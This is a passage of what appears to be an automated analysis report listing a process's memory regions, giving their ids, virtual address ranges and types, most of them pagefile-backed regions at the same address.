pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9633 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9634 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9635 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9636 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9637 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9638 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9639 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9640 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9641 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9642 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9643 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9644 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9645 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9646 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9647 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9648 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9649 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9650 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9651 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9657 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9658 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9659 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9660 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9661 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9662 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9663 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9664 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9665 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9666 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9667 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9668 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9669 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9670 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9671 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9672 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9673 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9674 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9675 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9676 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9677 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9678 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9679 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9680 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9681 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9682 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9683 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9684 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9685 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9686 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9687 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9688 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9695 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9696 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9697 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9698 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9699 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9700 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9701 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9702 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9703 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9704 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9705 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9706 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9729 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9730 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9731 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9732 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9733 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9734 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9735 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9736 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9737 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9738 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9739 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9740 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9741 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9742 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9743 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9744 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9745 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9746 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9747 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9748 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9749 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9750 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9751 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9752 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9753 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9754 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9755 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9756 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9757 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9759 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9760 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9761 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9762 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9763 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9764 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9765 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9766 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9767 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9768 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9769 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9770 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9771 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9772 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9773 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9774 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9775 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9776 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9777 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9778 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9779 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9780 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9781 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9782 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9783 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9784 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9785 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9798 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9799 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9800 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9801 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9802 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9803 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9804 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9805 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9806 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9807 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9808 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9809 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9810 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9811 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9812 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9813 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9814 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9815 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9816 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9817 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9818 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9819 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9820 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9821 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9822 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9823 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9824 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9825 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9826 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9827 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9828 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9829 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9830 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9837 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9838 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9839 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9840 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9841 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9842 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9843 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9844 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9845 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9846 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9847 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9848 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9849 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9850 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9851 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9852 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9853 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9960 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9961 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9962 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9963 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9964 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9965 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9966 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9967 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9968 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9969 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9970 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9971 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9972 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9973 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9974 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9975 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9976 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9977 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9978 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9979 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9980 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9981 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9982 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9983 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9984 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9985 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 